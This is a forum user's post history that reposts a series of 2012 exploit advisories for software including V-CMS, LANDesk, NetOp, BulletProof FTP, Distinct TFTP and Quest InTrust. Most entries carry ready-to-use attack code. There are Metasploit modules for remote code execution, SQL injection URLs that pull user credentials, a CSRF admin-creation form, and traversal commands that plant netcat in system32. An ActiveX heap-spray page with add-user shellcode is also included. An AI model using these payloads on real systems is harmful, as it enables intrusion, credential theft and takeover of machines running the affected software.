Jump to content

The_Arhitect

Active Members
 View Profile  See their activity

  • Posts

    425

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Everything posted by The_Arhitect

  1. The_Arhitect
    IrfanView FlashPix PlugIn Decompression Heap Overflow ##################################################################################### Application: IrfanView FlashPix PlugIn Decompression Heap Overflow Platforms: Windows Secunia Number: SA48772 {PRL}: 2012-08 Author: Francis Provencher (Protek Research Lab's) Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch ##################################################################################### 1) Introduction 2) Timeline 3) Technical details 4) PoC ##################################################################################### =============== 1) Introduction =============== IrfanView is a freeware/shareware image viewer for Microsoft Windows that can view, edit, and convert image files and play video/audio files. It is noted for its small size, speed, ease of use, and ability to handle a wide variety of graphic file formats, and has some image creation and painting capabilities. The software was first released in 1996. IrfanView is free for non-commercial use; commercial use requires paid registration. ##################################################################################### ============ 2) Timeline ============ 2012-04-06 - Vulnerability reported to secunia 2012-04-13 - Coordinated public release of advisory ##################################################################################### ================= 3) Technical details ================= The vulnerability is caused due to insufficient validation when decompressing FlashPix images and can be exploited to cause a heap-based buffer overflow via a specially crafted FPX file. ##################################################################################### ============= 4) The PoC ============= http://www.exploit-db.com/sploits/18739.fpx ############################################################################### Sursa: IrfanView FlashPix PlugIn Decompression Heap Overflow
  2. The_Arhitect
    V-CMS PHP File Upload and Execute ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "V-CMS PHP File Upload and Execute", 'Description' => %q{ This module exploits a vulnerability found on V-CMS's inline image upload feature. The problem is due to the inline_image_upload.php file not checking the file type before saving it on the web server. This allows any malicious user to upload a script (such as PHP) without authentication, and then execute it with a GET request. The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as one of those extension names, which may still be leveraged in an attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'AutoSec Tools', #Initial discovery 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2011-4828'], ['BID', '50706'], ['URL', 'http://bugs.v-cms.org/view.php?id=53'], ['URL', 'http://xforce.iss.net/xforce/xfdb/71358'] ], 'Payload' => { 'BadChars' => "\x00", }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['V-CMS 1.0', {}], ], 'Privileged' => false, 'DisclosureDate' => "Nov 27 2011", #When the ticket was created 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms/']) ], self.class) end def check res = send_request_raw({ 'uri' => target_uri.path, 'method' => 'GET' }) if res and res.body =~ /V\-CMS v1\.[0-1]/ return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def on_new_session(client) if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm(@payload_name) else client.shell_command_token("rm #{@payload_name}") end end def exploit peer = "#{rhost}:#{rport}" base = target_uri.path base << '/' if base[-1,1] != '/' @payload_name = "#{rand_text_alpha(5)}.php" p = %Q|<?php #{payload.encoded} ?> | p = p.gsub(/^\t\t/, '') post_data = "------x\r\n" post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n" post_data << "Content-Type: image/gif\r\n" post_data << "\r\n" post_data << p post_data << "------x--\r\n" print_status("#{peer} Uploading payload: #{@payload_name}") res = send_request_cgi({ 'uri' => "#{base}includes/inline_image_upload.php", 'method' => 'POST', 'ctype' => 'multipart/form-data; boundary=----x', 'data' => post_data }) if res print_status("#{peer} replies status: #{res.code.to_s}") else print_error("#{peer} No response from server. Will not continue") return end print_status("#{peer} Executing payload: #{@payload_name}") res = send_request_raw({ 'uri' => "#{base}temp/#{@payload_name}", 'method' => 'GET' }) if res and res.code == 404 print_error("#{peer} 404 - the upload probably failed") return end handler end end Sursa: V-CMS PHP File Upload and Execute
  3. The_Arhitect
    EMC IRM License Server DoS Server 4.6.1.1995 ####################################################################### Luigi Auriemma Application: EMC IRM License Server http://www.emc.com Versions: <= 4.6.1.1995 Platforms: Windows Bugs: A] "version compat check" *FIPS NULL pointer B] freezing caused by multiple commands C] NULL pointer caused by commands after invalid version Exploitation: remote Date: 10 Apr 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From the manual: "The IRM Server is a secure server containing a database that stores the encryption keys needed by authorized users to access protected content. The database also stores policies that specify who can access the information and what they can do with it." ####################################################################### ======= 2) Bugs ======= -------------------------------------------- A] "version compat check" *FIPS NULL pointer -------------------------------------------- The missing *FIPS fields in the "version compat check" command leads to a NULL pointer in execution: 004AB67B . 8D45 E4 LEA EAX,DWORD PTR SS:[EBP-1C] 004AB67E . 50 PUSH EAX 004AB67F . 53 PUSH EBX 004AB680 . 8D85 5C020000 LEA EAX,DWORD PTR SS:[EBP+25C] 004AB686 . 50 PUSH EAX 004AB687 . FF75 C4 PUSH DWORD PTR SS:[EBP-3C] 004AB68A . FF55 E8 CALL DWORD PTR SS:[EBP-18] ; NULL pointer --------------------------------------- B] freezing caused by multiple commands --------------------------------------- Process freezing caused by some continuous malformed commands, for example "batch begin untethered" with an Id composed by line-feeds. Note about the proof-of-concept: manually kill the PoC when everything seems inactive and you no longer receive data from the server so that it will start to consume resources. -------------------------------------------------------- C] NULL pointer caused by commands after invalid version -------------------------------------------------------- Looks like it's possible to cause some NULL pointer dereferences if the initial "version compat check" contains an invalid Version and then are sent other commands. The effect of all the vulnerabilities is the impossibility of using the IRM server, the pvcontrol.exe process remains active but it's no longer usable. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/irm_1.zip ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### Sursa: EMC IRM License Server DoS Server 4.6.1.1995
  4. The_Arhitect
    Software DEP Classified Script 2.5 SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Software DEP Classified Script 2.5 SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Author: h0rd Contact: h0rd[at]null.net homepage: http://h0rd.net download: http://www.softwaredep.com/classified-script.html Price: $199 PoC exploit: http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user-- login page: http://[host]/[script]/admin/ Sursa: Software DEP Classified Script 2.5 SQL Injection Vulnerability
  5. The_Arhitect
  6. The_Arhitect
    BulletProof FTP Client 2010 - Buffer Overflow Vulnerability Title: ====== BulletProof FTP Client 2010 - Buffer Overflow Vulnerability Date: ===== 2012-04-02 References: =========== http://www.vulnerability-lab.com/get_content.php?id=475 VL-ID: ===== 475 Introduction: ============= BPFTP Client is a fully automated FTP client, with many advanced features including automatic download resuming, leech mode, ftp search and much more. Perfect for personal or corporate Webmasters as well as for Software and Music traders. Features: + Automatic Resume/Reconnect + Browse Offline with Cache + Leech Mode + Hidden File Support + Download Credit/Ratio Support + Clipboard Monitor + Queue 1,000s of Actions + Proxy/Firewall Support + HTTP/Webserver Support + Import CuteFTP, WS_FTP, FTP Explorer + Remote Mirroring + Search and Filter Ability (Copy of the Vendor Homepage: http://www.bpftp.com ) Abstract: ========= A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on BulletProof FTP Client v2010.75.0.76 Report-Timeline: ================ 2012-03-14: Vendor Notification 2012-03-16: Vendor Response/Feedback 2012-04-02: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== BulletProof Product: BPFTP Client Software (Windows) v2010.75.0.76 & 2011.x Exploitation-Technique: ======================= Local Severity: ========= High Details: ======== A Buffer Overflow vulnerability is detected on BulletProof FTP Client v2010.75.0.76 (current version). The vulnerability is located in the main executeable bpftpclient.exe. During the start of the application the value LogFileName from the registry key [HKEY_CURRENT_USER/Software/BulletProof Software/BulletProof FTP Client 2010/Options] is read. When inserting an oversized value to the registry value a buffer overflow is triggered. The victim only needs to start the application. Vulnerable Module(s): [+] bpftpclient.exe --- Debugger Logs --- # 42424242: The instruction at 0x42424242 referenced memory at 0x42424242. The memory could not be read -> 42424242 (exc.code c0000005, tid 2264) # Registers: # EAX 00000000 # ECX 42424242 # EDX 7C9132BC ntdll.7C9132BC # EBX 00000000 # ESP 0012F594 # EBP 0012F5B4 # ESI 00000000 # EDI 00000000 # EIP 42424242 # Stack: # 0012F588 00140198 # 0012F58C 7C91D80A ntdll.7C91D80A # 0012F590 7C9601E1 ntdll.7C9601E1 # 0012F594 7C9132A8 RETURN to ntdll.7C9132A8 # 0012F598 0012F67C # 0012F59C 0012FBCC ASCII ``AAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC`` # 0012F5A0 0012F698 # Dump: # 0012FBB4 41 41 41 41 41 41 41 41 AAAAAAAA # 0012FBBC 41 41 41 41 41 41 41 41 AAAAAAAA # 0012FBC4 41 41 41 41 41 41 41 41 AAAAAAAA # 0012FBCC 41 41 41 41 42 42 42 42 AAAABBBB # 0012FBD4 43 43 43 43 43 43 43 43 CCCCCCCC # 0012FBDC 43 43 43 43 43 43 43 43 CCCCCCCC # 0012FBE4 43 43 43 43 43 43 43 43 CCCCCCCC Picture(s): ../1.png ../2.png Proof of Concept: ================= The vulnerability can be exploited by local attackers. Successful exploitation requires no user inter action. For demonstration or reproduce ... #!/usr/bin/python # Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow # Version: 2010.75.0.76 # Date: 2012-03-11 # Author: Julien Ahrens # Homepage: http://www.inshell.net # Software Link: http://www.bpftp.com/ # Tested on: Windows XP SP3 Professional German # Notes: - # Howto: Import Reg -> Start App file="poc.reg" junk1="\x41" * 448 boom="\x42\x42\x42\x42" junk2="\x43" * 100 poc="Windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n" poc=poc + "\"LogFileName\"=\"" + junk1 + boom + junk2 + "\"" try: print "[*] Creating exploit file...\n"; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!"; Risk: ===== The security risk of the local buffer overflow vulnerability is estimated as high(+). Credits: ======== Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright ? 2012|Vulnerability-Lab -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com Mail: research@vulnerability-lab.com Sursa: BulletProof FTP Client 2010 - Buffer Overflow Vulnerability
  7. The_Arhitect
    Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability # Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability # Date: 7/4/2012 # Author: Dr.NaNo # Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1 # Version: 1.4.0 # Tested on: Linux-Red-Hat # Google Dork: Powered By Utopia News Pro 1.4.0 # ######################################################## # ~ Exploit ~ # ######################################################## <html> <body> <form action="http://localhost/{PATh}/upload/users.php" method="post" /> <input type="hidden" name="username" value="NANO" /> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="password" value="102030" /> <input type="hidden" name="password2" value="102030" /> <input type="hidden" name="email" value="security@security.com" /> <input type="submit" name="submitnew" accesskey="s" value="ThankS !" /> </form> </body> </html> #### ~ Greetz ~ ######################################################### # # # Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020 # # # # JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng # # # ############################################### ~ All FriendS ~ ######### Sursa: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
  8. The_Arhitect
    Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability # Exploit Title: Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability # Date: April 8, 2012 # Software Link: http://www.distinct.com/index.php/downloads/index/p=ISERV # Affected Versions: 3.01 and previous version may also affected # Tested on: Windows XP SP3, Windows Server 2003 , Windows 7 SP1 Software Description -------------------- Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users. Vulnerability Details --------------------- The vulnerability is caused due to improper validation to GET and PUT Request containing dot dot slash ('../') sequences, which allows attackers to read or write arbitrary files. Attack Vector ------------- By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system file such as boot.ini or upload file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32\). Impact ------ Read and write files from remote machine. Proof of Concept ---------------- We assume that the directory is deep enough, so you have to set a deep path on the server configuration. If a GET request followed with '../../' (dot dot slash), trying to retrieve boot.ini file, is sent to Distinct TFTP Server 3.01, the file will be retrieved successfully. hell:~ modpr0be$ tftp -e 10.211.55.5 69 tftp> get ../../../../../../../../../../../../../boot.ini Received 211 bytes in 0.0 seconds tftp> Next, if we try to upload a file, let say Netcat (nc.exe), to Windows %systemroot% directory (C:\WINDOWS\system32\) using a PUT command, here is the result: hell:~ modpr0be$ tftp -e 10.211.55.5 69 tftp> put /Pentest/backdoor/nc.exe ../../../../../../../../../../../../../../../Windows/system32/nc.exe Sent 59392 bytes in 0.3 seconds tftp> Netcat successfully uploaded. Another combinations: tftp> get ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini tftp> put /Pentest/backdoor/nc.exe ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\nc.exe Solution Status --------------- Unavailable Risk Factor ----------- CVSS Base Score = 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) Exploitability Subscore = 10 Impact Subscore = 4.9 CVSS Temporal Score = 5.2 Overall CVSS Score = 5.8 Risk factor = Medium Credits ------- Tom Gregory from Spentera Research References ---------- http://www.spentera.com/advisories/2012/SPN-01-2012.pdf Disclosure Timeline ------------------- March 28, 2012, issue discovered March 28, 2012, vendor contacted about the issue, no response April 9, 2012, public advisory released Sursa: Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
  9. The_Arhitect
    LANDesk Lenovo ThinkManagement Console Remote Command Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize super( 'Name' => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution', 'Description' => %q{ This module can be used to execute a payload on LANDesk Lenovo ThinkManagement Suite 9.0.2 and 9.0.3. The payload is uploaded as an ASP script by sending a specially crafted SOAP request to "/landesk/managementsuite/core/core.*********/ServerSetup.asmx" , via a "RunAMTCommand" operation with the command '-PutUpdateFileCore' as the argument. After execution, the ASP script with the payload is deleted by sending another specially crafted SOAP request to "WSVulnerabilityCore/VulCore.asmx" via a "SetTaskLogByFile" operation. }, 'Author' => [ 'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], 'Version' => '$Revision: $', 'Platform' => 'win', 'References' => [ ['CVE', '2012-1195'], ['CVE', '2012-1196'], ['OSVDB', '79276'], ['OSVDB', '79277'], ['BID', '52023'], ['URL', 'http://www.exploit-db.com/exploits/18622/'], ['URL', 'http://www.exploit-db.com/exploits/18623/'] ], 'Targets' => [ [ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ], ], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Feb 15 2012' ) register_options( [ OptString.new('PATH', [ true, "The URI path of the LANDesk Lenovo ThinkManagement Console", '/']) ], self.class) end def exploit peer = "#{rhost}:#{rport}" # Generate the ASP containing the EXE containing the payload exe = generate_payload_exe asp = Msf::Util::EXE.to_exe_asp(exe) # htmlentities like encoding asp = asp.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">") uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/") upload_random = rand_text_alpha(rand(6) + 6) upload_xml_path = "ldlogon\\#{upload_random}.asp" soap = <<-eos <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <RunAMTCommand xmlns="http://tempuri.org/"> <Command>-PutUpdateFileCore</Command> <Data1>#{rand_text_alpha(rand(4) + 4)}</Data1> <Data2>#{upload_xml_path}</Data2> <Data3>#{asp}</Data3> <ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString> </RunAMTCommand> </soap:Body> </soap:Envelope> eos # # UPLOAD # attack_url = uri_path + "landesk/managementsuite/core/core.*********/ServerSetup.asmx" print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, 'method' => 'POST', 'ctype' => 'text/xml; charset=utf-8', 'headers' => { 'SOAPAction' => "\"http://tempuri.org/RunAMTCommand\"", }, 'data' => soap, }, 20) if (! res) print_status("#{peer} - Timeout: Trying to execute the payload anyway") elsif (res.code < 200 or res.code >= 300) print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]") return end # # EXECUTE # upload_path = uri_path + "ldlogon/#{upload_random}.asp" print_status("#{peer} - Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, 'method' => 'GET' }, 20) if (! res) print_error("#{peer} - Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code >= 300) print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end # # DELETE # soap = <<-eos <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <SetTaskLogByFile xmlns="http://tempuri.org/"> <computerIdn>1</computerIdn> <taskid>1</taskid> <filename>../#{upload_random}.asp</filename> </SetTaskLogByFile> </soap:Body> </soap:Envelope> eos attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx" print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, 'method' => 'POST', 'ctype' => 'text/xml; charset=utf-8', 'headers' => { 'SOAPAction' => "\"http://tempuri.org/SetTaskLogByFile\"", }, 'data' => soap, }, 20) if (! res) print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") return elsif (res.code < 200 or res.code >= 300) print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]") return end handler end end Sursa: LANDesk Lenovo ThinkManagement Console Remote Command Execution
  10. The_Arhitect
    NetOp Remote Control Client 9.5 Buffer Overflow', ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'NetOp Remote Control Client 9.5 Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5. When opening a .dws file containing a specially crafted string longer then 520 characters will allow an attacker to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ruben Alejandro "chap0"', ], 'References' => [ [ 'OSVDB', '72291' ], [ 'URL', 'http://www.exploit-db.com/exploits/17223/' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', 'DisablePayloadHandler' => 'true' }, 'Platform' => 'win', 'Payload' => { 'Space' => 2000, 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, 'StackAdjustment' => -3500 }, 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x20d6c32c, # push esp # ret - nrp.DLL 'Offset' => 524 } ] ], 'Privileged' => false, 'DisclosureDate' => 'Apr 28 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']), ], self.class) end def exploit buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << make_nops(30) buffer << payload.encoded file_create(buffer) end end Sursa: NetOp Remote Control Client 9.5 Buffer Overflow',
  11. The_Arhitect
    KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit #!/usr/bin/perl ################################################################################# # Advisory: KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit # Author: Stefan Schurtz # Affected Software: Successfully tested on KnFTPd 1.0.0 # Vendor URL: http://knftp.sourceforge.net/ # Vendor Status: informed # CVE-ID: - # PoC-Version: 1.0 ################################################################################# use strict; use Net::FTP; my $user = "system"; my $password = "secret"; ######################## # connect ######################## my $target = $ARGV[0]; my $plength = $ARGV[1]; print "\n"; print "\t#######################################################\n"; print "\t# This PoC-Exploit is only for educational purpose!!! #\n"; print "\t#######################################################\n"; print "\n"; if (!$ARGV[0]||!$ARGV[1]) { print "[+] Usage: $@ <target> <payload length>\n"; exit 1; } my $ftp=Net::FTP->new($target,Timeout=>12) or die "Cannot connect to $target: $@"; print "[+] Connected to $target\n"; ######################## # login ######################## $ftp->login($user,$password) or die "Cannot login ", $ftp->message; print "[+] Logged in with user $user\n"; ################################################### # Building payload './A' with min. length of 94 ################################################## my @p = ( "","./A" ); my $payload; print "[+] Building payload\n"; for (my $i=1;$i<=$plength;$i++) { $payload .= $p[$i]; push(@p,$p[$i]); } sleep(3); ######################################### # Sending payload ######################################### print "[+] Sending payload [$payload]\n"; $ftp->quot('FEAT ' ."$payload"); ########################################## # disconnect ########################################## print "[+] Done\n"; $ftp->quit; exit 0; #EOF Sursa: KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit
  12. The_Arhitect
    PicoPublisher v2.0 Remote SQL Injection # Exploit Title : PicoPublisher v2.0 Remote SQL injection # Date : 29/03/2012 # Author : ZeTH # Contact : zeth/at/hacktheplan8/dot/com http://www.hacktheplan8.com # Vendor : Pico Software # Site : http://pico.no/ # Version : 2.0 # Price : $29,00 # Dork : intext:"Drives med PicoPublisher" ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: --[1]-- Introduction PicoPublisher business software PicoPublisher is a product from Pico Software [Manage your website] PicoPublisher makes it easy to manage your website. With the built in templates you can add columns, slideshows, tabs, boxes and videos directly from the text editor. [Manage your customers] CRM systems are often too expensive for small businesses. With PicoPublisher you can manage your customers just as easy as your website. And at the same place! [Create invoices] Create professional PDF invoices in seconds. Add products to the database and insert products to the invoice directly. You will get notifications when invoices are overdue. --[2]-- Vulnerability Files : [+] page.php [+] single.php Attack Method : Remote SQL injection POC : [+] http://site/page.php?id=SQLi [+] http://site/single.php?id=SQLi Tables : +-------------------+ | customers | expenses | gallery_category | gallery_photos | invoice_reminders | invoices | invoices_product | menu_items | menus | notes | options | orders | orders_product | pages | pico_comments | pico_config | pico_karma_voted | posts | product_list | users +-------------------+ --[3]-- Greetz hacktheplan8 [hellcome to new friends kasp3r, Pitung] MainHack Brotherhood, Kecoak Elektronik, Echo packetstormsecurity, exploit-db, 1337day Paman, Vrs-hCk, OoN_BoY, em|nem, [S]hiro, Martin, xshadow, ElDiablo, Furkan, pizzyroot, H312Y Sursa: PicoPublisher v2.0 Remote SQL Injection
  13. The_Arhitect
    Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution homepage: http://www.quest.com/intrust/ description: "InTrust securely collects, stores, reports and alerts on event log data from Windows, Unix and Linux systems, helping you comply with external regulations, internal policies and security best practices." download url of a test version: http://www.quest.com/downloads/ file tested: Quest_InTrust---Full-Package_104.zip Background: The mentioned product installs an ActiveX control with the following settings: binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C} ProgID: AnnotationX.AnnList.1 Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True According to the IObjectSafety interface it is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control from remote. Vulnerability: By invoking the Add() method is possible to call inside a memory region of choice set by the attacker through ex. heap spray or other tecniques. Example code: <object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' /> </object> <script> obj.Add(0x76767676,1); </script> ... eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001 eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 ANNOTA_1+0xae62: 4400ae62 ff1485504a0244 call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=???????? ... You are in control of eax: fully exploitable. As attachment, proof of concept code. <!-- Quest InTrust 10.4.x Annotation Objects ActiveX Control (ANNOTATEX.DLL) Uninitialized Pointer Remote Code Execution PoC (ie7) binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C} ProgID: AnnotationX.AnnList.1 Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True --> <!-- saved from url=(0014)about:internet --> <html> <object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' /> </object> <script language='javascript'> //add user one, user "sun" pass "tzu" shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u0c0c%u0c0c"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<1000;i++){memory[i] = block+shellcode} </script> <script defer=defer> obj.Add(0x76767676,1); //this should result in an address beginning with 0x1d1d[..] </script> Sursa: Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
  14. The_Arhitect
